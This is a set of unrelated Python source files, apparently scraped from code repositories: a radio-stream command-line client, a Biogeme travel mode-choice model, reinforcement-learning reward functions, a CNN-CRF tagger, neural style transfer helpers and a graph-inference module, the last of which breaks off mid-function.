if '=' in line and line.startswith('File')])
def _get_stream_list(self, mode):
if mode in MODES:
url = 'http://listen.{mode}.fm/{quality}/'.format(
mode=mode,
quality=self.quality)
with open(self._get_stream_list_cache_file(url), 'r') as strm_cache:
data = json.load(strm_cache)
return data
else:
raise InvalidMode(mode)
def _get_stream_list_cache_file(self, stream_list_url):
filename = '/var/tmp/diskyfm_stream_list_{url_hash}'.format(
url_hash=hashlib.md5(stream_list_url).hexdigest())
if not os.path.exists(filename) or \
time.time() - os.path.getmtime(filename) > self.STREAM_CACHE_TTL:
with open(filename, 'w') as strm_cache:
strm_cache.write(urllib2.urlopen(stream_list_url).read())
return filename
def _identify_stream_mode(self, stream):
for (m, s) in ((m, s) for m in MODES for s in self._get_stream_list(m)):
if stream == s:
return m
else:
raise InvalidStream(stream)
def _identify_stream(self, mode=None, **kwargs):
if not len(kwargs):
raise InvalidStream()
if mode is None:
stream_list = self.stream_list
else:
stream_list = (s for m in MODES for s in self._get_stream_list(m))
for stream in stream_list:
if all(stream[key] == value for (key, value) in kwargs.iteritems()):
return stream
else:
raise InvalidStream(kwargs)
if __name__ == '__main__':
import sys
import optparse
import os.path
import ConfigParser
def get_options():
parser = optparse.OptionParser()
parser.add_option('-C', '--config-file', dest='config_file',
help='Use an alternate config file', metavar='FILE')
parser.add_option('-P', '--player', dest='player',
help='Use an alternate audio player', metavar='PLAYER')
parser.add_option('-R', '--random-stream', dest='random_stream', action='store_true',
help='Use an alternate audio player')
parser.add_option('-m', '--mode', dest='mode', type='choice',
choices=MODES+['all'])
parser.add_option('-q', '--quality', type='choice',
choices=[x for k in QUALITIES.values() for x in k], help='Set the stream quality')
parser.add_option('-a', '--auth-key',
help='Set the auth key for premium streams')
parser.add_option('-l', '--list-streams', action='store_true',
help='List the available streams')
parser.add_option('-u', '--show-url', action='store_true',
help='Don\'t play the stream, just show the URL')
return parser.parse_args()
def get_config(config_file):
defaults = {
'player': DEFAULT_PLAYER,
'quality': 'public3',
'mode': 'all',
}
parser = ConfigParser.RawConfigParser(defaults)
try:
with open(config_file, 'r') as cf:
parser.readfp(cf, config_file)
except OSError:
pass
return dict(parser.items('global'))
(opts, args) = get_options()
opts = dict((k,v) for (k,v) in vars(opts).items() if v is not None)
try:
config = get_config(opts['config_file'])
except KeyError:
config = get_config(os.path.expanduser('~/.diskyfmrc'))
config.update(opts)
streamer = AudioAddictSite(**config)
if 'list_streams' in config:
stream_list = streamer.stream_list
stream_key_width = max(len(s['key']) for s in stream_list)
txt = u'\n'.join(u'{s[key]: <{width}} -- {s[name]}'.format(
width=stream_key_width, s=s) for s in stream_list)
print ''.join(c for c in txt if ord(c) < 128)
else:
if 'random_stream' in config:
stream_key = random.choice([s['key'] for s in streamer.stream_list])
else:
try:
stream_key = args[0]
except IndexError:
stream_key = config['default_stream_key']
if 'show_url' in config:
print streamer.get_stream_url(key=stream_key)
else:
print 'Streaming {stream_key} @ {quality}...'.format(
stream_key=stream_key,
quality=streamer.quality)
streamer.play_stream(key=stream_key)
|
<gh_stars>10-100
from biogeme import *
from headers import *
from nested import *
from loglikelihood import *
from statistics import *
#import random
cons_bus = Beta('bus cons',0,-10,10,0)
cons_mrt = Beta('MRT cons',0,-10,10,0)
cons_privatebus=Beta('private bus cons',0,-10,10,0)
cons_drive1=Beta('drive alone cons',0,-10,10,1)
cons_share2=Beta('share2 cons',0,-10,10,0)
cons_share3=Beta('share3 plus cons',0,-10,10,0)
cons_motor=Beta('motor cons',0,-20,10,0)
cons_walk=Beta('walk cons',0,-10,10,0)
cons_taxi=Beta('taxi cons',0,-10,10,0)
beta1_1_tt = Beta('travel time beta1_1 ivt',0,-10,10,0)
beta1_2_tt = Beta('travel time beta1_2 waiting',0,-10,10,0)
beta1_3_tt = Beta('travel time beta1_3 walk',0,-10,10,0)
beta_private_1_tt=Beta('travel time beta_private_1 ivt',0,-10,10,0)
#beta_private_2_tt=Beta('travel time beta_private_2 wait',0,-10,10,0)
#beta_private_3_tt=Beta('travel time beta_private_2 walk',0,-10,10,0)
#beta2_tt = Beta('travel time beta2',0,-10,10,0)
beta2_tt_drive1 = Beta('travel time beta drive1',0,-10,10,0)
beta2_tt_share2 = Beta('travel time beta share2',0,-10,10,0)
beta2_tt_share3 = Beta('travel time beta share3',0,-10,10,0)
beta2_tt_motor = Beta('travel time beta motor',0,-10,10,1)
beta_tt_walk =Beta('travel time beta walk',0,-10,10,0)
beta_tt_taxi =Beta('travel time beta taxi',0,-10,10,0)
bound=15
beta_cost= Beta('generic cost beta',0,-bound,bound,1)
beta4_2_cost = Beta('travel cost beta4_2',0,-bound,bound,1)
beta5_2_cost = Beta('travel cost beta5_2',0,-bound,bound,1)
beta6_2_cost = Beta('travel cost beta6_2',0,-bound,bound,1)
beta7_2_cost = Beta('travel cost beta7_2',0,-bound,bound,1)
beta8_2_cost = Beta('travel cost beta8_2',0,-bound,bound,1)
beta9_2_cost = Beta('travel cost beta9_2',0,-bound,bound,1)
beta10_2_cost = Beta('travel cost beta10_2',0,-bound,bound,1)
beta_cost_erp=Beta('beta for (1-d2)*erp in car',0,-bound,bound,1)
beta_cost_parking=Beta('beta for (1-d1)*parking in car',0,-bound,bound,1)
beta_central_bus=Beta('central dummy in bus',0,-10,10,0)
beta_central_mrt=Beta('central dummy in mrt',0,-10,10,0)
beta_central_privatebus=Beta('central dummy in privatebus',0,-10,10,0)
beta_central_share2=Beta('central dummy in share2',0,-10,10,0)
beta_central_share3=Beta('central dummy in share3 plus',0,-10,10,0)
beta_central_motor=Beta('central dummy in motor',0,-10,10,0)
beta_central_taxi=Beta('central dummy in taxi',0,-10,10,0)
beta_central_walk=Beta('central dummy in walk',0,-10,10,0)
beta_female_bus=Beta('female dummy in bus',0,-10,10,0)
beta_female_mrt=Beta('female dummy in mrt',0,-10,10,0)
beta_female_privatebus=Beta('female dummy in privatebus',0,-10,10,0)
beta_female_drive1=Beta('female dummy in drive1',0,-10,10,1)
beta_female_share2=Beta('female dummy in share2',0,-10,10,0)
beta_female_share3=Beta('female dummy in share3 plus',0,-10,10,0)
beta_female_motor=Beta('female dummy in motor',0,-10,10,1)
beta_female_taxi=Beta('female dummy in taxi',0,-10,10,0)
beta_female_walk=Beta('female dummy in walk',0,-10,10,0)
#beta_autoown_cardriver=Beta('auto ownership in cardriver',0,-10,10,0)
#beta_autoown_carpassenger=Beta('auto ownership in carpassenger',0,-10,10,0)
#beta_motorown=Beta('motorcycle ownership in motor',0,-10,10,0)
beta_zero_drive1=Beta('zero cars in drive1',0,-10,10,1)
beta_oneplus_drive1=Beta('one plus cars in drive1',0,-10,10,1)
beta_twoplus_drive1=Beta('two plus cars in drive1',0,-10,10,1)
beta_threeplus_drive1=Beta('three plus cars in drive1',0,-10,30,1)
beta_zero_share2=Beta('zero cars in share2',0,-10,10,1)
beta_oneplus_share2=Beta('one plus cars in share2',0,-10,10,0)
beta_twoplus_share2=Beta('two plus cars in share2',0,-10,10,0)
beta_threeplus_share2=Beta('three plus cars in share2',0,-10,10,0)
beta_zero_share3=Beta('zero cars in share3 plus',0,-10,10,1)
beta_oneplus_share3=Beta('one plus cars in share3 plus',0,-10,10,0)
beta_twoplus_share3=Beta('two plus cars in share3 plus',0,-10,10,0)
beta_threeplus_share3=Beta('three plus cars in share3 plus',0,-30,10,1)
beta_zero_motor=Beta('zero motors in motor',0,-10,10,1)
beta_oneplus_motor=Beta('one plus motors in motor',0,-10,10,1)
beta_twoplus_motor=Beta('two plus motors in motor',0,-10,10,1)
beta_threeplus_motor=Beta('three plus motors in motor',0,-10,10,1)
beta_transfer=Beta('average transfer number in bus and mrt', 0,-10,10,1)
beta_distance=Beta('distance in private bus',0,-10,10,0)
beta_residence=Beta('home zone residential size in private bus',0,-10,10,0)
beta_residence_2=Beta('square of home zone residential size in private bus',0,-10,10,1)
beta_attraction=Beta('work zone work attraction in private bus',0,-10,10,0)
beta_attraction_2=Beta('square of work zone work attraction in private bus',0,-10,10,1)
MU1 = Beta('MU for car',1,1,100,0)
MU2 = Beta('MU for PT', 1,1,100,0)
beta_age_over_15_bus= Beta('Beta for age over 15 dummy in bus',0,-10,10,0)
beta_age_over_15_mrt= Beta('Beta for age over 15 dummy in mrt',0,-10,10,0)
beta_age_over_15_private_bus= Beta('Beta for age over 15 dummy in private bus',0,-10,10,1)
beta_age_over_15_drive1= Beta('Beta for age over 15 dummy in drive1',0,-10,10,1)
beta_age_over_15_share2= Beta('Beta for age over 15 dummy in share2',0,-10,10,0)
beta_age_over_15_share3= Beta('Beta for age over 15 dummy in share3',0,-10,10,1)
beta_age_over_15_motor= Beta('Beta for age over 15 dummy in motor',0,-10,10,1)
beta_age_over_15_walk= Beta('Beta for age over 15 dummy in walk',0,-10,10,0)
beta_age_over_15_taxi= Beta('Beta for age over 15 dummy in taxi',0,-10,10,0)
beta_university_student_bus= Beta('Beta for university student dummy in bus',0,-10,10,0)
beta_university_student_mrt= Beta('Beta for university student dummy in mrt',0,-10,10,0)
beta_university_student_private_bus= Beta('Beta for university student dummy in private bus',0,-10,10,0)
beta_university_student_drive1= Beta('Beta for university student dummy in drive1',0,-10,10,1)
beta_university_student_share2= Beta('Beta for university student dummy in share2',0,-10,10,0)
beta_university_student_share3= Beta('Beta for university student dummy in share3',0,-10,10,1)
beta_university_student_motor= Beta('Beta for university student dummy in motor',0,-10,10,1)
beta_university_student_walk= Beta('Beta for university student dummy in walk',0,-10,10,1)
beta_university_student_taxi= Beta('Beta for university student dummy in taxi',0,-10,10,0)
beta_distance_motor=Beta('distance in motor',0,-10,10,1)
#define cost and travel time
cost_bus=cost_public_first+cost_public_second
cost_mrt=cost_public_first+cost_public_second
cost_privatebus=cost_public_first+cost_public_second
cost_cardriver=cost_car_ERP_first+cost_car_ERP_second+cost_car_OP_first+cost_car_OP_second+cost_car_parking
cost_carpassenger=cost_car_ERP_first+cost_car_ERP_second+cost_car_OP_first+cost_car_OP_second+cost_car_parking
cost_motor=0.5*(cost_car_ERP_first+cost_car_ERP_second+cost_car_OP_first+cost_car_OP_second)+0.65*cost_car_parking
d1=walk_distance1
d2=walk_distance2
cost_taxi_1=3.4+((d1*(d1>10)-10*(d1>10))/0.35+(d1*(d1<=10)+10*(d1>10))/0.4)*0.22+ cost_car_ERP_first + Central_dummy*3
cost_taxi_2=3.4+((d2*(d2>10)-10*(d2>10))/0.35+(d2*(d2<=10)+10*(d2>10))/0.4)*0.22+ cost_car_ERP_second + Central_dummy*3
cost_taxi=cost_taxi_1+cost_taxi_2
tt_bus_ivt=tt_public_ivt_first+tt_public_ivt_second
tt_bus_wait=tt_public_waiting_first+tt_public_waiting_second
tt_bus_walk=tt_public_walk_first+tt_public_walk_second
tt_bus_all=tt_bus_ivt+tt_bus_wait+tt_bus_walk
tt_mrt_ivt=tt_public_ivt_first+tt_public_ivt_second
tt_mrt_wait=tt_public_waiting_first+tt_public_waiting_second
tt_mrt_walk=tt_public_walk_first+tt_public_walk_second
tt_mrt_all=tt_mrt_ivt+tt_mrt_wait+tt_mrt_walk
#tt_privatebus_ivt=tt_public_ivt_first+tt_public_ivt_second
tt_privatebus_ivt=tt_ivt_car_first+tt_ivt_car_second
tt_privatebus_wait=tt_public_waiting_first+tt_public_waiting_second
tt_privatebus_walk=tt_public_walk_first+tt_public_walk_second
tt_privatebus_all=tt_privatebus_ivt+tt_privatebus_wait+tt_privatebus_walk
tt_cardriver_ivt=tt_ivt_car_first+tt_ivt_car_second
tt_cardriver_out=1.0/6
tt_cardriver_all=tt_cardriver_ivt+tt_cardriver_out
tt_carpassenger_ivt=tt_ivt_car_first+tt_ivt_car_second
tt_carpassenger_out=1.0/6
tt_carpassenger_all=tt_carpassenger_ivt+tt_carpassenger_out
tt_motor_ivt=tt_ivt_car_first+tt_ivt_car_second
tt_motor_out=1.0/6
tt_motor_all=tt_motor_ivt+tt_motor_out
tt_walk=walk_time_first+walk_time_second
tt_taxi_ivt=tt_ivt_car_first+tt_ivt_car_second
tt_taxi_out=1.0/6
tt_taxi_all=tt_cardriver_ivt+tt_cardriver_out
age_over_15=1*(age_num>=3)
university_student=1*(student_type_num==6)
residential_size=resident_student/origin_area/10000.0
school_attraction=education_op/destination_area/10000.0
#V1=public bus -bus
#V2=MRT -MRT
#V3=Private bus -privatebus
#V4=car driver -cardriver (base)
#V5=car passenger-carpassenger
#V6=motor -motor
#V7=walk -walk
V1 = cons_bus + beta1_1_tt * tt_bus_ivt + beta1_2_tt * tt_bus_walk + beta1_3_tt * tt_bus_wait + beta_cost * cost_bus + beta_central_bus * Central_dummy + beta_transfer * average_transfer_number+beta_female_bus * Female_dummy + age_over_15*beta_age_over_15_bus + university_student * beta_university_student_bus
V2 = cons_mrt + beta1_1_tt * tt_mrt_ivt + beta1_2_tt * tt_mrt_walk + beta1_3_tt * tt_mrt_wait + beta_cost * cost_mrt + beta_central_mrt * Central_dummy + beta_transfer * average_transfer_number+beta_female_mrt * Female_dummy + age_over_15*beta_age_over_15_mrt + university_student * beta_university_student_mrt
V3 = cons_privatebus + beta_private_1_tt * tt_privatebus_ivt + beta_cost * cost_privatebus + beta_central_privatebus * Central_dummy+beta_distance*(d1+d2)+beta_residence*residential_size+beta_attraction*school_attraction+beta_residence_2*residential_size**2+beta_attraction_2*school_attraction**2+beta_female_privatebus* Female_dummy + age_over_15*beta_age_over_15_private_bus + university_student * beta_university_student_private_bus
V4 = cons_drive1 + beta2_tt_drive1 * tt_cardriver_all + beta_cost * cost_cardriver + beta_female_drive1 * Female_dummy + beta_zero_drive1 * zero_car + beta_oneplus_drive1 * one_plus_car + beta_twoplus_drive1 * two_plus_car + beta_threeplus_drive1 * three_plus_car+beta_cost_erp*(1-d2_dummy)*(cost_car_ERP_first+cost_car_ERP_second)+beta_cost_parking*(1-d1_dummy)*cost_car_parking + age_over_15*beta_age_over_15_drive1 + university_student * beta_university_student_drive1
V5 = cons_share2 + beta2_tt_share2 * tt_carpassenger_all + beta_cost * cost_carpassenger/2.0 + beta_central_share2 * Central_dummy + beta_female_share2 * Female_dummy + beta_zero_share2 * zero_car + beta_oneplus_share2 * one_plus_car + beta_twoplus_share2 * two_plus_car + beta_threeplus_share2 * three_plus_car + age_over_15*beta_age_over_15_share2 + university_student * beta_university_student_share2
V6 = cons_share3 + beta2_tt_share3 * tt_carpassenger_all + beta_cost * cost_carpassenger/3.0 + beta_central_share3 * Central_dummy + beta_female_share3 * Female_dummy + beta_zero_share3 * zero_car + beta_oneplus_share3 * one_plus_car + beta_twoplus_share3 * two_plus_car + beta_threeplus_share3 * three_plus_car + age_over_15*beta_age_over_15_share3 + university_student * beta_university_student_share3
V7 = cons_motor + beta2_tt_motor * tt_motor_all + beta_cost * cost_motor + beta_central_motor * Central_dummy + beta_zero_motor * zero_motor + beta_oneplus_motor * one_plus_motor + beta_twoplus_motor * two_plus_motor + beta_threeplus_motor * three_plus_motor + beta_female_motor * Female_dummy + age_over_15*beta_age_over_15_motor + university_student * beta_university_student_motor + beta_distance_motor * (d1+d2)
V8 = cons_walk + beta_tt_walk * tt_walk + beta_central_walk * Central_dummy+ beta_female_walk * Female_dummy + age_over_15*beta_age_over_15_walk + university_student * beta_university_student_walk
V9 = cons_taxi + beta_tt_taxi * tt_taxi_all + beta_cost * cost_taxi + beta_central_taxi * Central_dummy + beta_female_taxi * Female_dummy + age_over_15*beta_age_over_15_taxi + university_student * beta_university_student_taxi
V = {1:V1,2: V2,3:V3,4:V4,5:V5,6:V6,7:V7,8:V8,9:V9}
av= {1:bus_avail_dummy,2:mrt_avail_dummy,3:private_bus_avail_dummy,4:car_driver_avail_dummy,5:car_passenger_avail_dummy,6: car_passenger_avail_dummy,7:motor_avail_dummy_all,8:walk_avail_dummy,9:taxi_avail_dummy}
#Definition of nests:
# 1: nests parameter
# 2: list of alternatives
car = MU1 , [4,5,6,7]
PT = MU2 , [1,2,3]
other = 1.0, [8,9]
nests = car,PT,other
#nests=car,PT,private,motor,walk,taxi
# The choice model is a nested logit, with availability conditions
prob = nested(V,av,nests,choice_new)
rowIterator('obsIter')
BIOGEME_OBJECT.ESTIMATE = Sum(log(prob),'obsIter')
exclude = ((choice==0)+(PrimaryActivityIndex!=3)+(avail_violation==1)+(student_type_num==11)) > 0
BIOGEME_OBJECT.EXCLUDE = exclude
nullLoglikelihood(av,'obsIter')
choiceSet = [1,2,3,4,5,6,7,8,9]
cteLoglikelihood(choiceSet,choice_new,'obsIter')
availabilityStatistics(av,'obsIter')
BIOGEME_OBJECT.PARAMETERS['optimizationAlgorithm'] = "CFSQP"
BIOGEME_OBJECT.PARAMETERS['checkDerivatives'] = "1"
BIOGEME_OBJECT.PARAMETERS['numberOfThreads'] = "4"
|
<gh_stars>1-10
import math
import numpy as np
def resolve_reward(name):
rewards = {
"manhattan_distance": manhattan_distance,
"euclidean_distance": euclidean_distance,
"binary": binary,
"mo_time_score": mo_time_score,
"mo_death": mo_death,
"mo_success": mo_success,
"mo_compound": mo_compound,
"collision": collision
}
return rewards[name]
# def resolve_multiple_rewards(names):
# functions = names.split(",")
# for i in range(len(functions)):
# functions[i] = resolve_reward(functions[i].strip())
# print("functions:", functions)
# return functions
def resolve_multiple_rewards(names):
functions = names.split(",")
for i in range(len(functions)):
functions[i] = resolve_reward(functions[i].strip())
# print("functions:", functions)
return functions
def manhattan_distance(params):
"""
Manhattan distance from current position to target
Args:
current (tuple): x, y coordinates of the current position
target (tuple): x, y coordinates of the target
Returns:
(float): Manhattan distance from current position to target
"""
current, target, solution = params
if not solution:
return -100
dist = abs(target[0] - current[0]) + abs(target[1] - current[1])
target_reached = dist == 0
return -dist + (100 * target_reached)
def euclidean_distance(params):
current, target = params
# if not solution:
# return -100
# max_dist = np.sqrt(2*10**2)
dist = -np.linalg.norm(np.subtract(np.array(current), np.array(target)))
# dist = -np.sqrt( (current[0] - target[0])**2 + (current[1] - target[1])**2 )
# norm_dist = dist/max_dist
# print("dist, max_dist, norm_dist:", (dist, max_dist, norm_dist))
return dist
def collision(params):
def is_inside(current, obstacle):
"""
Returns whether current is inside obstacle
"""
a = obstacle.pt1
b = obstacle.pt2
num_total = 0
if current[0] in range(int(math.floor(min(a[0], b[0]))), int(math.ceil(max(a[0], b[0]) + 1))):
num_total += 1
if current[1] in range(int(math.floor(min(a[1], b[1]))), int(math.ceil(max(a[1], b[1]) + 1))):
num_total += 1
if current[2] in range(int(math.floor(min(a[2], b[2]))), int(math.ceil(max(a[2], b[2]) + 1))):
num_total += 1
if num_total == 3:
return True
return False
(current, obstacles) = params
for obstacle in obstacles:
if is_inside(current, obstacle):
return -50
return -1
def binary(params):
current, target, solution = params
if not solution:
return -100
if list(current) == list(target):
return 1
return -1
def mo_compound(params):
time_score, distance, died, success = params
# return (-distance*time_score*(1-died*-1) + 7000)*.001
max_dist = np.sqrt(2*10**2)
max_time = 40
# print([-distance/max_dist, time_score/max_time, (1-died*-1)])
return -distance/max_dist + time_score/max_time + (1-died*-1)
def mo_time_score(params):
score = params
return score
def mo_death(params):
died = params
return died*-1
def mo_success(params):
success = params
return success*2
|
import torch
import torch.nn as nn
from deepbond import constants
from deepbond.initialization import init_xavier, init_kaiming
from deepbond.models.model import Model
from deepbond.modules.crf import CRF
class CNNCRF(Model):
"""CNN with CRF on top"""
def __init__(self, words_field, tags_field, options):
super().__init__(words_field, tags_field)
#
# Embeddings
#
word_embeddings = None
if self.words_field.vocab.vectors is not None:
word_embeddings = self.words_field.vocab.vectors
options.word_embeddings_size = word_embeddings.size(1)
self.word_emb = nn.Embedding(
num_embeddings=len(self.words_field.vocab),
embedding_dim=options.word_embeddings_size,
padding_idx=constants.PAD_ID,
_weight=word_embeddings,
)
self.dropout_emb = nn.Dropout(options.emb_dropout)
if options.freeze_embeddings:
self.word_emb.weight.requires_grad = False
features_size = options.word_embeddings_size
#
# CNN 1D
#
self.cnn_1d = nn.Conv1d(in_channels=features_size,
out_channels=options.conv_size,
kernel_size=options.kernel_size,
padding=options.kernel_size // 2)
self.max_pool = nn.MaxPool1d(options.pool_length,
padding=options.pool_length // 2)
self.dropout_cnn = nn.Dropout(options.cnn_dropout)
self.relu = torch.nn.ReLU()
features_size = (options.conv_size // options.pool_length +
options.pool_length // 2)
#
# Linear
#
self.linear_out = nn.Linear(features_size, self.nb_classes)
self.crf = CRF(
self.nb_classes,
bos_tag_id=self.tags_field.vocab.stoi['_'], # hack
eos_tag_id=self.tags_field.vocab.stoi['.'], # hack
pad_tag_id=None,
batch_first=True,
)
self.init_weights()
self.is_built = True
def init_weights(self):
if self.cnn_1d is not None:
init_kaiming(self.cnn_1d, dist='uniform', nonlinearity='relu')
if self.linear_out is not None:
init_xavier(self.linear_out, dist='uniform')
def build_loss(self, loss_weights=None):
self._loss = self.crf
def loss(self, emissions, gold):
mask = gold != constants.TAGS_PAD_ID
crf_gold = gold.clone()
crf_gold[mask == 0] = 0
return self._loss(emissions, crf_gold, mask=mask.float())
def predict_classes(self, batch):
emissions = self.forward(batch)
mask = batch.words != constants.PAD_ID
_, path = self.crf.decode(emissions, mask=mask[:, 2:].float())
return [torch.tensor(p) for p in path]
def predict_proba(self, batch):
raise Exception('Predict() probability is not available.')
def forward(self, batch):
assert self.is_built
assert self._loss is not None
h = batch.words
# mask = h != constants.PAD_ID
# (bs, ts) -> (bs, ts, emb_dim)
h = self.word_emb(h)
h = self.dropout_emb(h)
# Turn (bs, ts, emb_dim) into (bs, emb_dim, ts) for CNN
h = h.transpose(1, 2)
# (bs, emb_dim, ts) -> (bs, conv_size, ts)
h = self.relu(self.cnn_1d(h))
# Turn (bs, conv_size, ts) into (bs, ts, conv_size) for Pooling
h = h.transpose(1, 2)
# (bs, ts, conv_size) -> (bs, ts, pool_size)
h = self.max_pool(h)
h = self.dropout_cnn(h)
# (bs, ts, pool_size) -> (bs, ts, nb_classes)
h = self.linear_out(h)
# remove <bos> and <eos> tokens
# (bs, ts, nb_classes) -> (bs, ts-2, nb_classes)
h = h[:, 1:-1, :]
return h
|
from argparse import ArgumentParser
from PIL import Image
from keras.preprocessing.image import load_img, img_to_array
import keras.backend as K
from keras.applications.vgg16 import preprocess_input
import numpy as np
from keras.applications import VGG16
from Settings import *
def build_parser():
parser = ArgumentParser()
parser.add_argument('--content', dest='content', required=True,
help='Content image, e.g. "input.jpg"')
parser.add_argument('--style', dest='style', required=True,
help='Style image, e.g. "style.jpg"')
parser.add_argument('--output', dest='output', required=True,
help='Output image, e.g. "output.jpg"')
parser.add_argument('--iter',dest='iter', required=False,default=400,
help='Iteration with default and suggested 400 Better to be multiple of 50')
parser.add_argument('--record', dest='record', required=False, default='F',
help='Record loss or not,T for record')
parser.add_argument('--flw', dest='flw', required=False, default='0',
help='Feature weight selected ')
parser.add_argument('--lt', dest='losstype', required=False, default='SE',
help='Loss type selected ')
parser.add_argument('--rstep', dest='rstep', required=False, default='50',
help='Record picture per step')
parser.add_argument('--alpha', dest='alpha', required=False, default='1.0',
help='alpha')
parser.add_argument('--beta', dest='beta', required=False, default='10000.0',
help='alpha')
parser.add_argument('--fromc', dest='fromc', required=False, default='F',
help='The output image is from content is initialization')
parser.add_argument('--cont', dest='continueTraining', required=False, default='F',
help='Activation of continuos training mode')
return parser
def inputImageUtils(imagePath,size):
"""
Dealing input image
Return Arrayed Image and original size
"""
rawImage=Image.open(imagePath)
rawImageSize=rawImage.size
image=load_img(path=imagePath,target_size=size)
ImageArray=img_to_array(image)
ImageArray=K.variable(preprocess_input(np.expand_dims(ImageArray, axis=0)), dtype='float32')
return ImageArray,rawImageSize
def outImageUtils(width,height):
"""
Initialize image and our target image
Return Initialized Image and Placeholder for calculation
"""
output=np.random.randint(256, size=(width, height, 3)).astype('float64')
output = preprocess_input(np.expand_dims(output, axis=0))
outputPlaceholder=K.placeholder(shape=(1, width,height, 3))
return output,outputPlaceholder
def outImageUtils2(imagePath,width,height):
"""
Initialize image from contentImg
"""
img=Image.open(imagePath)
img=img.resize((width,height))
imgarr=np.array(img)
output=preprocess_array(imgarr)
outputPlaceholder=K.placeholder(shape=(1,width,height,3))
return output,outputPlaceholder
def save_original_size(x,path, target_size):
"""
Save output image as its original size
"""
xIm = Image.fromarray(x)
xIm = xIm.resize(target_size)
xIm.save(path)
return xIm
def BuildModel(contentImgArr,styleImgArr,outputPlaceholder):
contentModel = VGG16(include_top=False, weights='imagenet', input_tensor=contentImgArr)
styleModel = VGG16(include_top=False, weights='imagenet', input_tensor=styleImgArr)
outModel = VGG16(include_top=False, weights='imagenet', input_tensor=outputPlaceholder)
return contentModel,styleModel,outModel
def postprocess_array(x):
# Zero-center by mean pixel
if x.shape != (WIDTH, HEIGHT, 3):
x = x.reshape((WIDTH,HEIGHT, 3))
x[..., 0] += 103.939
x[..., 1] += 116.779
x[..., 2] += 123.68
# 'BGR'->'RGB'
x = x[..., ::-1]
x = np.clip(x, 0, 255)
x = x.astype('uint8')
return x
def preprocess_array(x):
if x.shape != (WIDTH, HEIGHT, 3):
x = x.reshape((WIDTH,HEIGHT, 3))
# RGB -> BGR
x = x.astype('float64')
x = x[:, :, ::-1]
x[:, :, 0] -= 103.939
x[:, :, 1] -= 116.779
x[:, :, 2] -= 123.68
return x
|
<gh_stars>0
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
import utool as ut
import vtool as vt # NOQA
import plottool as pt
import six
import networkx as nx
print, rrr, profile = ut.inject2(__name__, '[graph_inference]')
# Monkey patch networkx
nx.set_edge_attrs = nx.set_edge_attributes
nx.get_edge_attrs = nx.get_edge_attributes
nx.set_node_attrs = nx.set_node_attributes
nx.get_node_attrs = nx.get_node_attributes
CUT_WEIGHT_KEY = 'cut_weight'
def _dz(a, b):
a = a.tolist() if isinstance(a, np.ndarray) else list(a)
b = b.tolist() if isinstance(b, np.ndarray) else list(b)
if len(a) == 0 and len(b) == 1:
# This introduces a corner case
b = []
elif len(b) == 1 and len(a) > 1:
b = b * len(a)
assert len(a) == len(b), 'out of alignment a=%r, b=%r' % (a, b)
return dict(zip(a, b))
def get_cm_breaking(qreq_, cm_list, ranks_top=None, ranks_bot=None):
"""
>>> from ibeis.algo.hots.graph_iden import * # NOQA
"""
# Construct K-broken graph
edges = []
if ranks_bot is None:
ranks_bot = 0
for count, cm in enumerate(cm_list):
score_list = cm.annot_score_list
rank_list = ut.argsort(score_list)[::-1]
sortx = ut.argsort(rank_list)
top_sortx = sortx[:ranks_top]
bot_sortx = sortx[-ranks_bot:]
short_sortx = ut.unique(top_sortx + bot_sortx)
daid_list = ut.take(cm.daid_list, short_sortx)
for daid in daid_list:
u, v = (cm.qaid, daid)
if v < u:
u, v = v, u
edges.append((u, v))
return edges
def estimate_threshold(curve, method=None):
"""
import plottool as pt
idx3 = vt.find_elbow_point(curve[idx1:idx2 + 1]) + idx1
pt.plot(curve)
pt.plot(idx1, curve[idx1], 'bo')
pt.plot(idx2, curve[idx2], 'ro')
pt.plot(idx3, curve[idx3], 'go')
"""
if len(curve) == 0:
return None
if method is None:
method = 'mean'
if method == 'mean':
thresh = np.mean(curve)
elif method == 'elbow':
idx1 = vt.find_elbow_point(curve)
idx2 = vt.find_elbow_point(curve[idx1:]) + idx1
thresh = curve[idx2]
else:
raise ValueError('method = %r' % (method,))
return thresh
@six.add_metaclass(ut.ReloadingMetaclass)
class InfrModel(ut.NiceRepr):
"""
Wrapper around graphcut algorithms
"""
def __init__(model, graph):
#def __init__(model, n_nodes, edges, edge_weights=None, n_labels=None,
model.graph = graph
model._update_state()
def _update_state(model):
import networkx as nx
name_label_key = 'name_label'
weight_key = CUT_WEIGHT_KEY
# Get nx graph properties
external_nodes = sorted(list(model.graph.nodes()))
external_edges = list(model.graph.edges())
edge2_weights = nx.get_edge_attrs(model.graph, weight_key)
node2_labeling = nx.get_node_attrs(model.graph, name_label_key)
edge_weights = ut.dict_take(edge2_weights, external_edges, 0)
external_labeling = ut.take(node2_labeling, external_nodes)
# Map to internal ids for pygco
internal_nodes = ut.rebase_labels(external_nodes)
extern2_intern = dict(zip(external_nodes, internal_nodes))
internal_edges = ut.unflat_take(extern2_intern, external_edges)
internal_labeling = ut.rebase_labels(external_labeling)
n_nodes = len(internal_nodes)
# Model state
model.n_nodes = n_nodes
model.extern2_intern = extern2_intern
model.intern2_extern = ut.invert_dict(extern2_intern)
model.edges = internal_edges
model.edge_weights = edge_weights
# Model parameters
model.labeling = np.zeros(model.n_nodes, dtype=np.int32)
model._update_labels(labeling=internal_labeling)
model._update_weights()
def __nice__(self):
return 'n_nodes=%r, n_labels=%r' % (self.n_nodes, self.n_labels)
#return '(n_nodes=%r, n_labels=%r, nrg=%r)' % (self.n_nodes,
#self.n_labels, self.total_energy)
def _update_labels(model, n_labels=None, unaries=None, labeling=None):
if labeling is not None:
n_labels_ = max(labeling) + 1
assert n_labels is None or n_labels == n_labels_
n_labels = n_labels_
if n_labels is None:
n_labels = 2
if unaries is None:
unaries = np.zeros((model.n_nodes, n_labels), dtype=np.int32)
# Update internals
model.pairwise_potts = -1 * np.eye(n_labels, dtype=np.int32)
model.n_labels = n_labels
model.unaries = unaries
if model.labeling.max() >= n_labels:
model.labeling = np.zeros(model.n_nodes, dtype=np.int32)
def _update_weights(model, thresh=None):
int_factor = 1E2
edge_weights = np.array(model.edge_weights)
if thresh is None:
thresh = model._estimate_threshold()
else:
if isinstance(thresh, six.string_types):
thresh = model._estimate_threshold(method=thresh)
#np.mean(edge_weights)
if True:
# Center and scale weights between -1 and 1
centered = (edge_weights - thresh)
centered[centered < 0] = (centered[centered < 0] / thresh)
centered[centered > 0] = (centered[centered > 0] / (1 - thresh))
newprob = (centered + 1) / 2
newprob[np.isnan(newprob)] = .5
# Apply logit rule
# prevent infinity
#pad = 1 / (int_factor * 2)
